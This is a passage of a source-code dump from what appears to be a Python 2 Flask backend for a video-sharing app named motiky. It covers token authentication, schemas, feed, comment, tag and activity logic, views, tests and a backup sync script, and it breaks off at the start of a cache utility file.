"Python", "length_bytes": 2299, "license_type": "no_license", "max_line_length": 84, "num_lines": 92, "path": "/motiky/application.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n\nimport os\nimport logging\nimport hmac\n\nfrom flask import g\nfrom flask import Flask\nfrom flask import request\nfrom flask import make_response\nfrom flask import session\n\nfrom motiky import configs\nfrom motiky.configs import db,cache,mail,redis\n\nfrom motiky import logic\nfrom motiky import authutil\nfrom motiky.logic import backend\nfrom motiky.coreutil import BackendError\n\nfrom motiky.views import user,post,tag,feed,\\\n activity,comment\n\n# add some other view\n\n__all__ = ['create_app']\n\n\nDEFAULT_APP_NAME = 'motiky'\n\n\ndef create_app(config=None,app_name=None):\n \n if app_name is None:\n app_name = DEFAULT_APP_NAME\n \n app = Flask(app_name)\n\n configure_app(app,config)\n configure_db(app)\n configure_blueprints(app)\n configure_cache(app)\n configure_handler(app)\n return app\n\ndef configure_app(app,config):\n app.config.from_object(configs.DefaultConfig())\n\n if config is not None:\n app.config.from_object(config)\n\n app.config.from_envvar('APP_CONFIG',silent=True)\n\ndef configure_db(app):\n db.init_app(app)\n\ndef configure_cache(app):\n redis.init_app(app)\n\ndef configure_handler(app):\n\n @app.before_request\n def authorize():\n print request.headers\n if request.path.startswith('/admin'):\n return\n\n token = request.headers.get('X-MOTIKY-TOKEN') or ''\n tokens = token.split('|')\n if len(tokens) != 3:\n print 'unvalid request'\n response = make_response('unvalid request',403)\n return response\n\n ukey,_time,signature = tokens\n print ukey,_time,signature\n sign = hmac.new(app.config.get('APPLICATION_SECRET'),ukey+_time).hexdigest()\n if sign != signature:\n print 'sian != signature unvalid request'\n response = make_response('unvalid request',403)\n return response\n g.ukey = ukey\n\n\ndef configure_blueprints(app):\n app.register_blueprint(user.instance,url_prefix=None)\n app.register_blueprint(post.instance,url_prefix=None)\n app.register_blueprint(tag.instance,url_prefix=None)\n app.register_blueprint(feed.instance,url_prefix=None)\n app.register_blueprint(comment.instance,url_prefix=None)\n app.register_blueprint(activity.instance,url_prefix=None)\n\n" }, { "alpha_fraction": 0.5593220591545105, "alphanum_fraction": 0.564769983291626, "avg_line_length": 25.206348419189453, "blob_id": "0f4d6b8fbed035b4f9bfb485b11066a3cac35fc9", "content_id": "e6f3b2150aaa609d766e2064dac5dbf384503ac0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1702, "license_type": "no_license", "max_line_length": 74, "num_lines": 63, "path": "/motiky/authutil.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport time\nimport hmac\nimport datetime\nimport hashlib\nfrom hashlib import sha1,md5\n\nimport strutil\n\nfrom flask import g,request,redirect,session\nfrom flask import current_app as app\n\nfrom motiky.configs import db,redis\nfrom motiky.logic.models import User\n\ndef user_required(f):\n \"\"\"必须登陆后才能访问的视图\"\"\"\n def decorator(*args,**kwargs):\n ukey = g.ukey\n if not ukey:\n return make_response('need a user',403)\n rp = redis.pipeline()\n rp.exists('USER-UKEY::%s'%ukey)\n rp.get('USER-UKEY::%s'%ukey)\n res = iter(rp.execute())\n \n if not res.next():\n # redis 中不存在 插数据库\n user = db.session.query(User).filter(User.uid == ukey).first()\n if user is None:\n res = make_response('the user does not exist',403)\n return res\n g.user_id = user.id\n rp.set('USER-UKEY::%s'%ukey,user.id)\n rp.execute()\n else:\n g.user_id = int(res.next())\n return f(*args,**kwargs)\n return decorator\n\ndef get_user_id(ukey):\n \"\"\"根据ukey来获取user_id\"\"\"\n if not ukey:\n return None\n rp = redis.pipeline()\n rp.exists('USER-UKEY::%s'%ukey)\n rp.get('USER-UKEY::%s'%ukey)\n res = iter(rp.execute())\n\n user_id = None\n if not res.next():\n user = db.session.query(User).filter(User.uid == ukey).first()\n if user is None:\n return None\n g.user_id = user_id = user.id\n rp.set('USER-UKEY::%s'%ukey,user.id)\n rp.execute()\n else:\n g.user_id = user_id = int(res.next())\n return user_id\n\n" }, { "alpha_fraction": 0.7145413756370544, "alphanum_fraction": 0.7185682058334351, "avg_line_length": 30.899999618530273, "blob_id": "16c684214b02cf6b781ebd363234451f7d4b3407", "content_id": "852cb43aab5a3278d60d68d46c9d75b05a9e42d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2235, "license_type": "no_license", "max_line_length": 67, "num_lines": 70, "path": "/motiky/schema.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# the schema for motiky's api\n\nimport colander\nfrom datetime import datetime\nfrom colander import SchemaNode,MappingSchema,SequenceSchema\nfrom colander import Int,Date,String,Bool,DateTime\nfrom colander import Range,Length\n\nclass IdListSchema(SequenceSchema):\n id = SchemaNode(Int(),validator=Range(min=1))\n\nclass StrListSchema(SequenceSchema):\n _str = SchemaNode(String())\n\nclass LimitOffsetSchema(MappingSchema):\n offset = SchemaNode(Int())\n limit = SchemaNode(Int())\n\nclass NewUserSchema(MappingSchema):\n uid = SchemaNode(String())\n access_token = SchemaNode(String(),missing=u'')\n\nclass UpdateUserSchema(MappingSchema):\n username = SchemaNode(String(encoding='utf-8'),missing=None)\n photo_url = SchemaNode(String(encoding='utf-8'),missing=None)\n signature = SchemaNode(String(encoding='utf-8'),missing=None)\n access_token = SchemaNode(String(encoding='utf-8'),missing=u'')\n status = SchemaNode(String(encoding='utf-8'),missing=None)\n date_update = SchemaNode(DateTime(),missing=None)\n\nclass UserFollowSchema(MappingSchema):\n user_ids = IdListSchema()\n\nclass InstallSchema(MappingSchema):\n device_type = SchemaNode(String())\n device_token = SchemaNode(String())\n version = SchemaNode(String())\n user_id = SchemaNode(Int())\n\n\nclass PushSchema(MappingSchema):\n user_id = SchemaNode(Int())\n install_id = SchemaNode(String())\n action = SchemaNode(String())\n \nclass NewPostSchema(MappingSchema):\n title = SchemaNode(String(),missing=None)\n author_id = SchemaNode(Int())\n #tag_id = SchemaNode(Int(),missing=None)\n\nclass UpdatePostSchema(MappingSchema):\n title = SchemaNode(String(encoding='utf-8'),missing=None)\n author_id = SchemaNode(Int(),missing=None)\n pic_small = SchemaNode(String(encoding='utf-8'),missing=None)\n date_update = SchemaNode(DateTime(),missing=datetime.now())\n\nclass NewCommentSchema(MappingSchema):\n post_id = SchemaNode(Int())\n author_id = SchemaNode(Int())\n content = SchemaNode(String())\n\nclass PostLikeSchema(MappingSchema):\n user_id = SchemaNode(Int())\n post_id = SchemaNode(Int())\n\nclass PostUnlikeSchema(MappingSchema):\n user_id = SchemaNode(Int())\n post_id = SchemaNode(Int())\n\n\n" }, { "alpha_fraction": 0.6540540456771851, "alphanum_fraction": 0.6702702641487122, "avg_line_length": 18.034482955932617, "blob_id": "6582964f86e55d3942b8e1f94492da53391b38f2", "content_id": "12c61cd37b00c6f61f2e75cc7dc1e6a037fa5441", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 555, "license_type": "no_license", "max_line_length": 66, "num_lines": 29, "path": "/motiky/logic/logic_action.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# author: notedit\n# date: 2013-01-30\n\nimport types\nimport traceback\n\nfrom motiky.coreutil import BackendError,register,assert_error\n\nfrom motiky.logic.models import User,Post,Action\n\nfrom motiky.configs import db\n\n\n\n@register('add_action')\ndef add_action(ainfo={}):\n action = Action(**ainfo)\n try:\n db.session.add(action)\n db.session.commit()\n except:\n db.session.rollback()\n raise BackendError('InternalError',traceback.format_exc())\n else:\n return action.json\n\n\n# add some other\n\n\n\n" }, { "alpha_fraction": 0.5522071123123169, "alphanum_fraction": 0.5645161271095276, "avg_line_length": 29.545454025268555, "blob_id": "0c8967172f0dc89cde3a49a2a3843e28ebd1843b", "content_id": "ade8c0f483e16b1921b29bbb00b075f588d8558a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2356, "license_type": "no_license", "max_line_length": 80, "num_lines": 77, "path": "/tests/test_user.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n\nimport os\nimport sys\nimport types\nimport json\nimport time\nfrom datetime import datetime\nfrom datetime import timedelta\n\nfrom tests import TestCase\n\n\nfrom motiky.logic.models import User,Post,UserLikeAsso,Report,Install,\\\n UserFollowAsso,Comment,Activity,Action\n\nfrom motiky.logic import backend\n\nfrom motiky.configs import db,redis\n\nclass TestUser(TestCase):\n\n\n def test_user_view(self):\n \n # post\n headers = self.generate_header('weibo_id1')\n data = {'uid':'weibo_id1',\n 'access_token':'1111111111'}\n resp = self.client.post('/user',data=json.dumps(data),\n headers=headers,content_type='application/json')\n print resp.data\n _data = json.loads(resp.data)\n assert resp.status_code == 200\n assert _data['uid'] == 'weibo_id1'\n assert _data['access_token'] == '1111111111'\n\n # get\n resp = self.client.get('/user/%d'%_data['id'],headers=headers)\n data_get = json.loads(resp.data)\n assert data_get['uid'] == 'weibo_id1'\n\n # put\n put_in = {'photo_url':'put_url','date_upate':str(datetime.now())}\n resp = self.client.put('/user/%d'%_data['id'],\n data=json.dumps(put_in),headers=headers,\n content_type='application/json')\n print resp.data\n assert resp.status_code == 204\n\n def test_install(self):\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n device_token = 'device_token'\n \n headers = self.generate_header('weibo_id01')\n \n data = {\n 'device_type':'ios',\n 'device_token':device_token,\n 'version':'1.1.10',\n 'user_id':user1['id']\n }\n\n resp = self.client.post('/install',data=json.dumps(data),\n headers=headers,content_type='application/json')\n\n _data = json.loads(resp.data)\n install_id = _data['install_id']\n \n install = Install.query.filter(Install.user_id == user1['id']).first()\n assert install is not None\n assert install.device_token.encode('utf-8') == device_token\n\n def test_user_follow(self):\n headers = self.generate_header('weibo_id01')\n pass\n\n\n\n\n" }, { "alpha_fraction": 0.6410356760025024, "alphanum_fraction": 0.6488819122314453, "avg_line_length": 30.432098388671875, "blob_id": "4b054b747c1d2780e2ea88f07703f164e309d34e", "content_id": "c9efead97232e771d7e60a599e4d75f6242ad2bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2565, "license_type": "no_license", "max_line_length": 74, "num_lines": 81, "path": "/motiky/logic/logic_comment.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# author: notedit\n# date: 2013-04-15\n\nimport types\nimport traceback\n\n\nfrom motiky.coreutil import BackendError,register,assert_error\n\nfrom motiky.logic.models import User,Post,Comment\n\nfrom motiky.configs import db,redis\n\n\n@register('add_comment')\ndef add_comment(post_id,content,author_id):\n assert_error(type(post_id) == types.IntType,'ParamError')\n assert_error(type(author_id) == types.IntType,'ParamError')\n assert_error(type(content) == types.StringType,'ParamError')\n\n qd = {\n 'post_id':post_id,\n 'content':content,\n 'author_id':author_id\n }\n co = Comment(**qd)\n try:\n db.session.add(co)\n db.session.commit()\n except:\n db.session.rollback()\n raise BackendError('InternalError',traceback.format_exc())\n return co.json\n\n@register('set_comment')\ndef set_comment(comment_id,dinfo):\n keys_set = ('post_id','author_id','content','show','date_create')\n if not set(dinfo.keys()).issubset(keys_set):\n raise BackendError('ParamError','更新的字段不允许')\n comment = Comment.query.get(comment_id)\n for key,value in dinfo.items():\n if value is not None:\n setattr(comment,key,value)\n try:\n db.session.commit()\n except Exception,ex:\n db.session.rollback()\n raise BackendError('InternalError',traceback.format_exc())\n return comment.json\n\n@register('get_comment')\ndef get_comment(comment_id):\n assert_error(type(comment_id) == types.IntType,'ParamError')\n comm = Comment.query.get(comment_id)\n return comm.json\n\n@register('get_post_comment')\ndef get_post_comment(post_id,limit=50,offset=0,show=True):\n assert_error(type(post_id) == types.IntType,'ParamError')\n _ans = [Comment.show == True,] if show else []\n _ans.append(Comment.post_id == post_id)\n q = reduce(db.and_,_ans)\n comms = Comment.query.filter(q).order_by(Comment.date_create.desc()).\\\n limit(limit).offset(offset).all()\n return [c.json for c in comms]\n\n@register('get_post_comment_count')\ndef get_post_comment_count(post_id,show=True):\n _ans = [Comment.show == True,] if show else []\n _ans.append(Comment.post_id == post_id)\n q = reduce(db.and_,_ans)\n count = Comment.query.filter(q).count()\n return count\n\n@register('add_comment_count')\ndef add_comment_count(post_id,step=1):\n count_key = 'POST::COMMENT_COUNT::%s' % str(post_id)\n if redis.exists(count_key):\n rp = redis.pipeline()\n rp.incr(count_key).expire(count_key,24*5*3600).execute()\n\n\n\n" }, { "alpha_fraction": 0.6944212913513184, "alphanum_fraction": 0.6952539682388306, "avg_line_length": 22.54901885986328, "blob_id": "1cc06a6d4e0ae030592cc09ec3fd3c86293761dd", "content_id": "a5e2d1bb8c3067c43109a8e0d71832bb0bf57027", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1201, "license_type": "no_license", "max_line_length": 70, "num_lines": 51, "path": "/motiky/views/push.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# author: notedit <[email protected]>\n\nimport sys \nimport time\nimport logging\n\nimport flask\nfrom flask import g\nfrom flask import request\nfrom flask import redirect\nfrom flask import Response\nfrom flask import current_app\nfrom flask import session\nfrom flask import jsonify\nfrom flask import flash\nfrom flask.views import MethodView\nfrom flask.views import View\n\nfrom missing import authutil\nfrom missing.site import instance\nfrom missing.logic import backend\nfrom missing.coreutil import BackendError\nfrom missing.configs import redis,rq\n\ninstance = Blueprint('push',__name__)\n\n\[email protected]('/push',methods=('POST',))\ndef push():\n \"\"\"\n user_id:int\n data:{\n 'alert':str,\n 'sound':str,\n 'custom':dict\n }\n https://github.com/simonwhitaker/PyAPNs\n \"\"\"\n if not request.json:\n return jsonify(error='content-type should be json')\n if not set(['user_id','data']).issubset(set(request.json.keys())):\n return jsonify(error='params error')\n\n user_id = request.json['user_id']\n data = request.json['data']\n\n rq.enqueue('onepiece.worker.apns_push',user_id=user_id,data=data)\n \n return jsonify(ok='push is in the queue')\n" }, { "alpha_fraction": 0.6025130152702332, "alphanum_fraction": 0.6068035364151001, "avg_line_length": 29.212963104248047, "blob_id": "cd420b550f13c87e00541a6e309e58813656cf0d", "content_id": "dbbfd181298e6aa4e63fe724ba3bf536c733ded8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3263, "license_type": "no_license", "max_line_length": 107, "num_lines": 108, "path": "/motiky/logic/logic_feed.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# author: notedit\n# date: 2013-04-10\n\nimport os\nimport types\nimport traceback\nfrom datetime import datetime\n\nfrom flask import current_app\n\nfrom motiky.coreutil import BackendError,register,assert_error\n\nfrom motiky.logic.models import User,Post,Tag,Activity,UserFollowAsso\n\nfrom motiky.configs import db,DefaultConfig\n\n\nNEW_FEED_SQL = \"\"\"\n SELECT id FROM answer WHERE show=true AND date_create > %(last_update_time)s \n AND (%(following_limit)s) LIMIT 1\n \"\"\"\n\nGET_LATEST_FEED_SQL = \"\"\"\n SELECT id,title,pic_small,pic_big,video_url,author_id,show,recommended,play_count,\n date_create,date_update,date_publish FROM post WHERE date_create < %(now)s AND show=true \n AND (%(following_limit)s) ORDER BY date_create DESC \n LIMIT %(limit)s OFFSET %(offset)s\n \"\"\"\n \nVALUE_LIST = ['id','title','pic_small','pic_big','video_url','author_id',\n 'show','recommended','play_count','date_create','date_update',\n 'date_publish']\n\ndef _get_following_user(user_id):\n fu = UserFollowAsso.query.filter(UserFollowAsso.user_id == user_id).all()\n if fu:\n fuids = [u.user_id_to for u in fu if u]\n else:\n fuids = []\n return fuids\n\n@register('get_new_feed')\ndef get_new_feed(user_id,last_update_time):\n\n fus = _get_following_user(user_id)\n fus.extend([user_id])\n fus = set(fus)\n\n following_limit = []\n if fus:\n following_limit.append('author_id IN (%s)' % ','.join([repr(uid) for uid in fus]))\n else:\n following_limit.append('1=1')\n\n following_limit.append('recommended = true')\n\n following_limit = ' OR '.join(following_limit)\n\n sql = NEW_FEED_SQL % {'following_limit':following_limit,'last_update_time':repr(str(last_update_time))}\n\n res = db.session.execute(sql).fetchall()\n return True if len(res) else False\n\n@register('get_latest_feed')\ndef get_latest_feed(user_id,limit,offset):\n \n qd = {\n 'limit':repr(limit),\n 'offset':repr(offset)\n }\n \n fus = _get_following_user(user_id)\n fus.extend([user_id])\n fus = set(fus)\n \n following_limit = []\n if fus:\n following_limit.append('author_id IN (%s)' % ','.join([repr(uid) for uid in fus]))\n else:\n following_limit.append('1=1')\n\n following_limit.append('recommended = true')\n\n following_limit = ' OR '.join(following_limit)\n\n _now = repr(str(datetime.now()))\n\n qd.update({'following_limit':following_limit,'now':_now})\n sql = GET_LATEST_FEED_SQL % qd\n\n print sql\n\n video_url_prefix = '/' if not current_app else current_app.config.get('VIDEO_URL_PREFIX')\n\n res = db.session.execute(sql).fetchall()\n ress = []\n for re in res:\n _dict = dict(zip(VALUE_LIST,re))\n _dict.update({\n 'date_create':_dict['date_create'].strftime('%Y-%m-%d %H:%M:%S'),\n 'date_update':_dict['date_update'].strftime('%Y-%m-%d %H:%M:%S'),\n 'date_publish':_dict['date_publish'].strftime('%Y-%m-%d %H:%M:%S'),\n 'video_url':os.path.join(video_url_prefix,_dict['video_url'] or ''),\n 'pic_small':os.path.join(video_url_prefix,_dict['pic_small'] or ''),\n })\n ress.append(_dict)\n return ress\n" }, { "alpha_fraction": 0.61654132604599, "alphanum_fraction": 0.6224772334098816, "avg_line_length": 29.08333396911621, "blob_id": "44f932b695c2ea359ea8d368798291523348f26a", "content_id": "6db7b73c2c8a1c0edbff044f972226070a250268", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2527, "license_type": "no_license", "max_line_length": 97, "num_lines": 84, "path": "/motiky/views/feed.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# author: notedit <[email protected]>\n# date: 2013-04-10\n\nimport sys \nimport time\nimport logging\nimport flask\nfrom flask import g\nfrom flask import request\nfrom flask import Blueprint\nfrom flask import redirect\nfrom flask import Response\nfrom flask import current_app\nfrom flask import session\nfrom flask import jsonify\nfrom flask import flash\nfrom flask.views import MethodView\nfrom flask.views import View\n\nfrom motiky import authutil\nfrom motiky.logic import backend\nfrom motiky.coreutil import BackendError\nfrom motiky.configs import redis\n\ninstance = Blueprint('feed',__name__)\n\nFEED_UPDATE_TIME_KEY = 'FEED::UPDATETIME::%(user_id)s'\n\ndef pipe_load(feeds):\n # todo some pipe load\n feeds_ret = []\n for po in feeds:\n try:\n user = backend.get_user(po['author_id'])\n po['user'] = user\n po['like_count'] = backend.get_post_liked_count(po['id'])\n po['comment_count'] = backend.get_post_comment_count(po['id']) \n except BackendError,ex:\n continue\n return feeds\n\nclass NewFeedView(MethodView):\n\n def get(self,user_id):\n feed_time_meta = redis.hgetall(FEED_UPDATE_TIME_KEY % {'user_id':user_id})\n try:\n last_update_time = int(feed_time_meta.get('last_update_time'))\n except:\n last_update_time = int(time.time())\n\n last_update_time = datetime.fromtimestamp(last_update_time)\n res = backend.get_new_feed(user_id,last_update_time)\n return jsonify(has_new=res)\n\nclass FeedsView(MethodView):\n\n def get(self,user_id):\n try:\n page = int(request.values.get('page'))\n except:\n page = 1\n\n limit = 10\n offset = (page-1) * limit\n \n feeds = backend.get_latest_feed(user_id,limit,offset)\n\n if len(feeds) > 0:\n feeds = pipe_load(feeds) \n \n curr_user = backend.get_user_by_uid(g.ukey)\n liked_post_ids = [p['id'] for p in feeds]\n liked_dict = backend.is_like_post(curr_user['id'],liked_post_ids)\n for up in feeds:\n up['is_like'] = liked_dict.get(up['id']) or False\n\n if page == 1:\n redis.hset(FEED_UPDATE_TIME_KEY % {'user_id':user_id},\n 'last_update_time',int(time.time()))\n return jsonify(results=feeds,page=page)\n\ninstance.add_url_rule('/feeds/<int:user_id>',view_func=FeedsView.as_view('feed'))\ninstance.add_url_rule('/feeds/notify/<int:user_id>',view_func=NewFeedView.as_view('feed_notify'))\n" }, { "alpha_fraction": 0.5175958871841431, "alphanum_fraction": 0.5385527610778809, "avg_line_length": 30.4375, "blob_id": "c320b55fb95b685f767a0b8df0a04c7c700710bf", "content_id": "f00214384ad8169ab6d856658b0891432668659b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2529, "license_type": "no_license", "max_line_length": 81, "num_lines": 80, "path": "/tests/test_activity.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport types\nimport json\nimport time\nfrom datetime import datetime\nfrom datetime import timedelta\n\nfrom StringIO import StringIO\n\nfrom tests import TestCase\n\n\nfrom motiky.logic.models import User,Post,UserLikeAsso,Report,Install,\\\n UserFollowAsso,Comment,Activity,Action\n\nfrom motiky.logic import backend\n\nfrom motiky.configs import db,redis\n\nclass TestActivity(TestCase):\n\n\n def test_user_activity_view(self):\n\n # get\n user1 = backend.add_user('username1','photo_url','weibo_id1')\n user2 = backend.add_user('username2','photo_url','weibo_id2')\n post1 = backend.add_post('title1',user1['id'],'video_url',\n pic_small='pic_small')\n post2 = backend.add_post('title2',user1['id'],'video_url',\n pic_small='pic_small')\n \n comment1 = backend.add_comment(post1['id'],'comment1',user1['id'])\n\n ac1 = {\n 'post_id':post1['id'],\n 'from_id':user1['id'],\n 'to_id':user2['id'],\n 'atype':'like'\n }\n ac2 = {\n 'post_id':post1['id'],\n 'from_id':user1['id'],\n 'comment_id':comment1['id'],\n 'to_id':user2['id'],\n 'atype':'comment'\n }\n\n\n ret = backend.add_activity(ac1)\n ret = backend.add_activity(ac2)\n backend.new_install(user2['id'],'device_token')\n\n headers = self.generate_header('weibo_id2')\n resp = self.client.get('/user/%d/activity' % user2['id'],headers=headers)\n _data = json.loads(resp.data)\n assert resp.status_code == 200\n assert len(_data['results']) == 2\n\n redis.flushall()\n redis.hset('ACTIVITY::UPDATETIME::%(user_id)s' % {'user_id':user2['id']},\n 'last_update_time',int(time.time() - 3600 * 6))\n\n resp = self.client.get('/user/%d/activity/count' % user2['id'],\n headers=headers)\n _data = json.loads(resp.data)\n assert resp.status_code == 200\n assert _data['count'] == 2\n\n redis.hset('ACTIVITY::UPDATETIME::%(user_id)s' % {'user_id':user2['id']},\n 'last_update_time',int(time.time()) + 2)\n\n resp = self.client.get('/user/%d/activity/count' % user2['id'],\n headers=headers)\n _data = json.loads(resp.data)\n assert resp.status_code == 200\n assert _data['count'] == 0\n\n\n\n\n \n\n" }, { "alpha_fraction": 0.6745964288711548, "alphanum_fraction": 0.6847918629646301, "avg_line_length": 29.894737243652344, "blob_id": "4a4c053ca322cc3285b3c242f963c03187219526", "content_id": "f0df987921002baef0ca6b3708412b39f06330bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1177, "license_type": "no_license", "max_line_length": 85, "num_lines": 38, "path": "/motiky/logic/logic_activity.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# author: notedit\n# date: 2013-04-10\n\nimport types\nimport traceback\n\nfrom motiky.coreutil import BackendError,register,assert_error\n\nfrom motiky.logic.models import User,Post,Tag,Activity\n\nfrom motiky.configs import db\n\n@register('add_activity')\ndef add_activity(ainfo):\n act = Activity(**ainfo)\n try:\n db.session.add(act)\n db.session.commit()\n except:\n db.session.rollback()\n raise BackendError('InternalError',traceback.format_exc())\n else:\n return act.json\n\n@register('get_new_activity_count')\ndef get_new_activity_count(user_id,last_update_time):\n assert_error(type(user_id) == types.IntType,'ParamError')\n count = Activity.query.filter(Activity.to_id == user_id).\\\n filter(Activity.date_create > last_update_time).count()\n return count\n\n@register('get_activity_by_user')\ndef get_activity_by_user(user_id,limit=30,offset=0):\n assert_error(type(user_id) == types.IntType,'ParamError')\n activitys = Activity.query.filter(Activity.to_id == user_id).\\\n order_by(db.desc(Activity.date_create)).limit(limit).offset(offset).all()\n return [a.json for a in activitys]\n\n\n\n" }, { "alpha_fraction": 0.5830469727516174, "alphanum_fraction": 0.6231386065483093, "avg_line_length": 29.59649085998535, "blob_id": "6b5ffc97aae9e3447c3d86e692b3131b1d2610af", "content_id": "7d7de02d8510eb50fbf7498063850e99d4131fd1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1746, "license_type": "no_license", "max_line_length": 74, "num_lines": 57, "path": "/tests/test_feed.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n\nimport os\nimport sys\nimport types\nimport json\nimport time\nfrom datetime import datetime\nfrom datetime import timedelta\n\nfrom StringIO import StringIO\n\nfrom tests import TestCase\n\n\nfrom motiky.logic.models import User,Post,UserLikeAsso,Report,Install,\\\n UserFollowAsso,Comment,Activity,Action\n\nfrom motiky.logic import backend\n\nfrom motiky.configs import db,redis\n\nclass TestFeed(TestCase):\n\n\n def test_feeds_view(self):\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n user2 = backend.add_user('username02','photo_url02','weibo_id02')\n user3 = backend.add_user('username03','photo_url03','weibo_id03') \n user4 = backend.add_user('username04','photo_url04','weibo_id04')\n\n post1 = backend.add_post('title01',user1['id'],'video_url01',\n pic_small='pic_small01')\n post2 = backend.add_post('title02',user2['id'],'video_url02',\n pic_small='pic_small')\n post3 = backend.add_post('title03',user3['id'],'video_url03',\n pic_small='pic_small03')\n post4 = backend.add_post('title04',user4['id'],'video_url04',\n pic_small='pic_small04')\n\n backend.follow_user(user4['id'],user1['id'])\n backend.follow_user(user4['id'],user2['id'])\n\n headers = self.generate_header('weibo_id04')\n\n resp = self.client.get('/feeds/%d' % user4['id'],headers=headers)\n ret = json.loads(resp.data)\n assert len(ret['results']) == 3\n\n\n backend.set_post(post3['id'],{'recommended':True})\n\n resp = self.client.get('/feeds/%d'% user4['id'],headers=headers)\n ret = json.loads(resp.data)\n\n assert len(ret['results']) == 4\n\n\n" }, { "alpha_fraction": 0.7209302186965942, "alphanum_fraction": 0.7209302186965942, "avg_line_length": 42, "blob_id": "5749c024e75be9302b489d880b730ee6ffad5bb2", "content_id": "91ef97cc6cb7aa8adaa2246a7a60e44764e65092", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 86, "license_type": "no_license", "max_line_length": 67, "num_lines": 2, "path": "/scripts/sync.sh", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "#!/usr/bin/env sh\nrsync -ravz --exclude=.hg wwwuser@host:/data/backups /data/backups\n" }, { "alpha_fraction": 0.5908882021903992, "alphanum_fraction": 0.6115968823432922, "avg_line_length": 26.468355178833008, "blob_id": "51b39ec8011999f62d22128c338eab9f318b9036", "content_id": "11a485c04eac47f7a7c9f69a0269c5c2584aca74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2211, "license_type": "no_license", "max_line_length": 69, "num_lines": 79, "path": "/motiky/logic/logic_tag.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# author: notedit\n# date: 2013-04-10\n\nimport types\nimport traceback\n\nfrom motiky.coreutil import BackendError,register,assert_error\n\nfrom motiky.logic.models import User,Post,Tag,Tagging\n\nfrom motiky.configs import db\n\n# 99999999 编辑推荐\n# 99999998 热门\n# 这里应该排除推荐推荐和热门\n@register('get_all_tags')\ndef get_all_tags():\n tags = Tag.query.filter(Tag.show == True).\\\n filter(db.not_(Tag.id.in_([99999999,99999998]))).\\\n order_by(Tag.order_seq.desc()).all()\n return [tag.json for tag in tags]\n\n@register('get_recommend_tags')\ndef get_recommend_tags():\n tags = Tag.query.filter(Tag.show == True).\\\n filter(Tag.recommended == True).\\\n order_by(Tag.order_seq.desc()).all()\n return [tag.json for tag in tags]\n\n@register('get_tag')\ndef get_tag(tag_id):\n assert_error(type(tag_id) == types.IntType,'ParamError')\n tag = Tag.query.get(tag_id)\n return tag.json\n\n@register('get_tag_post_count')\ndef get_tag_post_count(tag_id):\n assert_error(type(tag_id) == types.IntType,'ParamError')\n count = Tagging.query.filter(Tagging.tag_id == tag_id).count()\n return count\n\n@register('get_tag_post')\ndef get_tag_post(tag_id,limit=10,offset=0):\n assert_error(offset>=0,'ParamError')\n posts = Post.query.join(Tagging,Post.id == Tagging.taggable_id).\\\n filter(Tagging.tag_id == tag_id).\\\n filter(Post.show == True).\\\n order_by(Tagging.date_create.desc()).\\\n limit(limit).offset(offset).all()\n return [p.json for p in posts];\n\ndef _get_tag_id(tagstr):\n tag = Tag.query.filter(Tag.name == tagstr).first()\n if tag:\n return tag.id\n _tag = Tag(name=tagstr)\n try:\n db.session.add(_tag)\n db.session.commit()\n except:\n pass\n else:\n return _tag.id\n\n return None\n\n@register('add_post_tag')\ndef add_post_tag(post_id,tags):\n for tag in tags:\n t = _get_tag_id(tag)\n if t is None:\n continue\n try:\n tagging = Tagging(taggable_id=post_id,tag_id=t)\n db.session.add(tagging)\n db.session.commit()\n except:\n db.session.rollback()\n\n\n\n" }, { "alpha_fraction": 0.5325779318809509, "alphanum_fraction": 0.5387586951255798, "avg_line_length": 31.066116333007812, "blob_id": "58b0f27f74ca6f194e01505956ce981dc79248e9", "content_id": "271126e6ab69c1bb8637bf04a907897c23d57f4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4141, "license_type": "no_license", "max_line_length": 86, "num_lines": 121, "path": "/motiky/cacheutil.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# File: 